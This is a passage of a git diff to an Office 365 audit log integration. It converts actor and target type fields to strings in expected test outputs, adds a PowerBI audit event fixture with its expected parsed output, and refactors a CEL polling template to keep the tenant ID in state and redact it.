+ "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4806,15 +4806,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4837,7 +4837,7 @@ "Target": [ { "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4936,15 +4936,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4967,7 +4967,7 @@ "Target": [ { "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5066,7 +5066,7 @@ "Actor": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5088,7 +5088,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5181,15 +5181,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5213,7 +5213,7 @@ "Target": [ { "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5312,15 +5312,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5343,7 +5343,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5442,15 +5442,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5473,7 +5473,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5572,15 +5572,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5603,7 +5603,7 @@ "Target": [ { "ID": "00000002-0000-0ff1-ce00-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5702,7 +5702,7 @@ "Actor": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5724,7 +5724,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5817,15 +5817,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5848,7 +5848,7 @@ "Target": [ { "ID": "00000002-0000-0ff1-ce00-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5947,15 +5947,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5978,7 +5978,7 @@ "Target": [ { "ID": "00000002-0000-0ff1-ce00-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6077,15 +6077,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6108,7 +6108,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6207,15 +6207,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6238,7 +6238,7 @@ "Target": [ { "ID": "00000004-0000-0ff1-ce00-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6337,15 +6337,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6368,7 +6368,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6467,15 +6467,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6498,7 +6498,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6597,15 +6597,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6628,7 +6628,7 @@ "Target": [ { "ID": "00000002-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6727,15 +6727,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6758,7 +6758,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6857,15 +6857,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6888,7 +6888,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6987,15 +6987,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7018,7 +7018,7 @@ "Target": [ { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7117,15 +7117,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7148,7 +7148,7 @@ "Target": [ { "ID": "00000002-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7247,15 +7247,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7278,7 +7278,7 @@ "Target": [ { "ID": "00000002-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7377,15 +7377,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7408,7 +7408,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7507,15 +7507,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7538,7 +7538,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7637,15 +7637,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7668,7 +7668,7 @@ "Target": [ { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7767,15 +7767,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7798,7 +7798,7 @@ "Target": [ { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7897,15 +7897,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7928,7 +7928,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8027,15 +8027,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8058,7 +8058,7 @@ "Target": [ { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8157,15 +8157,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8188,7 +8188,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8287,15 +8287,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8318,7 +8318,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8417,15 +8417,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8448,7 +8448,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8547,15 +8547,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8578,7 +8578,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8677,15 +8677,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8708,7 +8708,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8807,15 +8807,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8838,7 +8838,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json index 29668206886..e1a4d335b6d 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json @@ -39,11 +39,11 @@ "Actor": [ { "ID": "21119711-1517-43d4-8138-b537dafad016", - "Type": 0 + "Type": "0" }, { "ID": "root@testsiem4.onmicrosoft.com", - "Type": 5 + "Type": "5" } ], "ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", @@ -64,7 +64,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-stringly-json-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-stringly-json-events.json new file mode 100644 index 00000000000..6eefdf8cdf1 --- /dev/null +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-stringly-json-events.json @@ -0,0 +1,34 @@ +{ + "events": [ + { + "event": { + "original": "{\"Activity\":\"CreateArtifact\",\"WorkspaceName\":\"obszar_robaczy\",\"OrganizationId\":\"53d83e1d-xxx-xxx-84e9-01ec5045dd81\",\"Operation\":\"CreateArtifact\",\"Id\":\"a4420e70-b7a1-xxx-xxx-11e3364acd22\",\"CreationTime\":\"2024-01-30T14:23:40\",\"Timestamp\":\"2024-01-30T14:22:50\",\"UserId\":\"username@domain.pl\",\"ClientIP\":\"81.2.69.144\",\"RecordType\":20,\"ResultStatus\":\"InProgress\",\"ObjectDisplayName\":\"test_lakehouse\",\"OperationId\":\"a84f7f73-xxxx-xxxx-8cf3-094f69c23756\",\"Experience\":\"Lakehouse\",\"WorkspaceId\":\"91dad513-xxxx-xxxx-94bb-f5cbf305691c\",\"ObjectId\":\"0e00d1cf-825a-4d78-98ff-8a8199357669\",\"UserAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\",\"Workload\":\"PowerBI\",\"RequestId\":\"fcbbe282-xxx-xxxx-xxxx-dc1e6d9b090b\",\"OperationProperties\":\"[{\\\"Name\\\":\\\"SystemArtifactType\\\",\\\"Value\\\":\\\"None\\\"}]\",\"ObjectType\":\"Lakehouse\",\"UserType\":0,\"UserKey\":\"xxxxxxxx\"}" + }, + "o365audit": { + "Activity": "CreateArtifact", + "WorkspaceName": "obszar_robaczy", + "OrganizationId": "53d83e1d-xxx-xxx-84e9-01ec5045dd81", + "Operation": "CreateArtifact", + "Id": "a4420e70-b7a1-xxx-xxx-11e3364acd22", + "CreationTime": "2024-01-30T14:23:40", + "Timestamp": "2024-01-30T14:22:50", + "UserId": "username@domain.pl", + "ClientIP": "81.2.69.144", + "RecordType": 20, + "ResultStatus": "InProgress", + "ObjectDisplayName": "test_lakehouse", + "OperationId": "a84f7f73-xxxx-xxxx-8cf3-094f69c23756", + "Experience": "Lakehouse", + "WorkspaceId": "91dad513-xxxx-xxxx-94bb-f5cbf305691c", + "ObjectId": "0e00d1cf-825a-4d78-98ff-8a8199357669", + "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", + "Workload": "PowerBI", + "RequestId": "fcbbe282-xxx-xxxx-xxxx-dc1e6d9b090b", + "OperationProperties": "[{\"Name\":\"SystemArtifactType\",\"Value\":\"None\"}]", + "ObjectType": "Lakehouse", + "UserType": 0, + "UserKey": "xxxxxxxx" + } + } + ] +} \ No newline at end of file diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-stringly-json-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-stringly-json-events.json-expected.json new file mode 100644 index 00000000000..d6893154166 --- /dev/null +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-stringly-json-events.json-expected.json @@ -0,0 +1,110 @@ +{ + "expected": [ + { + "@timestamp": "2024-01-30T14:23:40.000Z", + "client": { + "address": "81.2.69.144", + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "CreateArtifact", + "category": [ + "web" + ], + "code": "PowerBIAudit", + "id": "a4420e70-b7a1-xxx-xxx-11e3364acd22", + "kind": "event", + "original": "{\"Activity\":\"CreateArtifact\",\"WorkspaceName\":\"obszar_robaczy\",\"OrganizationId\":\"53d83e1d-xxx-xxx-84e9-01ec5045dd81\",\"Operation\":\"CreateArtifact\",\"Id\":\"a4420e70-b7a1-xxx-xxx-11e3364acd22\",\"CreationTime\":\"2024-01-30T14:23:40\",\"Timestamp\":\"2024-01-30T14:22:50\",\"UserId\":\"username@domain.pl\",\"ClientIP\":\"81.2.69.144\",\"RecordType\":20,\"ResultStatus\":\"InProgress\",\"ObjectDisplayName\":\"test_lakehouse\",\"OperationId\":\"a84f7f73-xxxx-xxxx-8cf3-094f69c23756\",\"Experience\":\"Lakehouse\",\"WorkspaceId\":\"91dad513-xxxx-xxxx-94bb-f5cbf305691c\",\"ObjectId\":\"0e00d1cf-825a-4d78-98ff-8a8199357669\",\"UserAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\",\"Workload\":\"PowerBI\",\"RequestId\":\"fcbbe282-xxx-xxxx-xxxx-dc1e6d9b090b\",\"OperationProperties\":\"[{\\\"Name\\\":\\\"SystemArtifactType\\\",\\\"Value\\\":\\\"None\\\"}]\",\"ObjectType\":\"Lakehouse\",\"UserType\":0,\"UserKey\":\"xxxxxxxx\"}", + "outcome": "success", + "provider": "PowerBI", + "type": [ + "info" + ] + }, + "host": { + "id": "53d83e1d-xxx-xxx-84e9-01ec5045dd81", + "name": "domain.pl" + }, + "network": { + "type": "ipv4" + }, + "o365": { + "audit": { + "Activity": "CreateArtifact", + "CreationTime": "2024-01-30T14:23:40", + "Experience": "Lakehouse", + "ObjectDisplayName": "test_lakehouse", + "ObjectId": "0e00d1cf-825a-4d78-98ff-8a8199357669", + "ObjectType": "Lakehouse", + "OperationId": "a84f7f73-xxxx-xxxx-8cf3-094f69c23756", + "OperationProperties": [ + { + "Name": "SystemArtifactType", + "Value": "None" + } + ], + "RecordType": "20", + "RequestId": "fcbbe282-xxx-xxxx-xxxx-dc1e6d9b090b", + "ResultStatus": "InProgress", + "Timestamp": "2024-01-30T14:22:50", + "UserId": "username@domain.pl", + "UserKey": "xxxxxxxx", + "UserType": "0", + "WorkspaceId": "91dad513-xxxx-xxxx-94bb-f5cbf305691c", + "WorkspaceName": "obszar_robaczy" + } + }, + "organization": { + "id": "53d83e1d-xxx-xxx-84e9-01ec5045dd81" + }, + "related": { + "ip": [ + "81.2.69.144" + ], + "user": [ + "username" + ] + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "domain.pl", + "email": "username@domain.pl", + "id": "username@domain.pl", + "name": "username" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Chrome", + "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", + "os": { + "full": "Windows 10", + "name": "Windows", + "version": "10" + }, + "version": "120.0.0.0" + } + } + ] +} \ No newline at end of file diff --git a/packages/o365/data_stream/audit/_dev/test/system/test-cel-config.yml b/packages/o365/data_stream/audit/_dev/test/system/test-cel-config.yml index bf63d73d6f8..e518190073f 100644 --- a/packages/o365/data_stream/audit/_dev/test/system/test-cel-config.yml +++ b/packages/o365/data_stream/audit/_dev/test/system/test-cel-config.yml @@ -12,5 +12,6 @@ data_stream: azure_tenant_id: test-cel-tenant-id content_types: "Audit.SharePoint, Audit.General" initial_interval: 12h + enable_request_tracer: true assert: - hit_count: 6 + hit_count: 8 diff --git a/packages/o365/data_stream/audit/_dev/test/system/test-o365audit-config.yml b/packages/o365/data_stream/audit/_dev/test/system/test-o365audit-config.yml deleted file mode 100644 index dff36f749e2..00000000000 --- a/packages/o365/data_stream/audit/_dev/test/system/test-o365audit-config.yml +++ /dev/null @@ -1,18 +0,0 @@ -input: o365audit -service: o365 -vars: ~ -policy_template: o365 -data_stream: - vars: - preserve_original_event: true - application_id: test-app-id - client_secret: test-secret - tenants: - - tenant-id - tenant_names: - - "tenant-id: domain-name" - api: | - authentication_endpoint: http://{{Hostname}}:{{Port}}/ - resource: http://{{Hostname}}:{{Port}} -assert: - hit_count: 27 diff --git a/packages/o365/data_stream/audit/agent/stream/cel.yml.hbs b/packages/o365/data_stream/audit/agent/stream/cel.yml.hbs index bb9bd7bf305..1c9e47a9dbe 100644 --- a/packages/o365/data_stream/audit/agent/stream/cel.yml.hbs +++ b/packages/o365/data_stream/audit/agent/stream/cel.yml.hbs @@ -60,20 +60,20 @@ resource.tracer.maxsize: 5 state: want_more: false base: - list_contents_url: "{{url}}/api/v1.0/{{azure_tenant_id}}/activity/feed/subscriptions/content?contentType=" + tenant_id: "{{azure_tenant_id}}" list_contents_start_time: "{{initial_interval}}" redact: - fields: ~ + fields: + - base.tenant_id program: | - now().as(now, // Prevent now time skew. Remove this and the closing parenthesis when kibana.version is 8.10.1 or higher. "{{content_types}}".split(",").map(content_type_raw, content_type_raw.trim_space() ).map(content_type, request( "POST", - "{{url}}/api/v1.0/{{azure_tenant_id}}/activity/feed/subscriptions/start?contentType=" + content_type + "&PublisherIdentifier={{azure_tenant_id}}" + "{{url}}/api/v1.0/" + state.base.tenant_id + "/activity/feed/subscriptions/start?contentType=" + content_type + "&PublisherIdentifier=" + state.base.tenant_id ).do_request().as(start_subs_resp, bytes(start_subs_resp.Body).decode_json().as(start_subs_resp_body, ( @@ -104,7 +104,9 @@ program: | : state_created_at ).as(state_created_at_calc, - state.base.list_contents_url + content_type + "&PublisherIdentifier={{azure_tenant_id}}" + "{{url}}/api/v1.0/" + state.base.tenant_id + + "/activity/feed/subscriptions/content?contentType=" + content_type + + "&PublisherIdentifier=" + state.base.tenant_id + "&startTime=" + string(state_created_at_calc + duration("1s")) + "&endTime=" + string((state_created_at_calc + batch_interval).as(calc_end_time, calc_end_time <= now ? calc_end_time : now)) ) @@ -112,7 +114,9 @@ program: | ) : // initial run when no cursor state exists i.e., polling from initial_interval - state.base.list_contents_url + content_type + "&PublisherIdentifier={{azure_tenant_id}}" + "{{url}}/api/v1.0/" + state.base.tenant_id + + "/activity/feed/subscriptions/content?contentType=" + content_type + + "&PublisherIdentifier=" + state.base.tenant_id + "&startTime=" + string(now - duration(state.base.list_contents_start_time)) + "&endTime=" + string((now - duration(state.base.list_contents_start_time) + batch_interval).as(calc_end_time, calc_end_time <= now ? 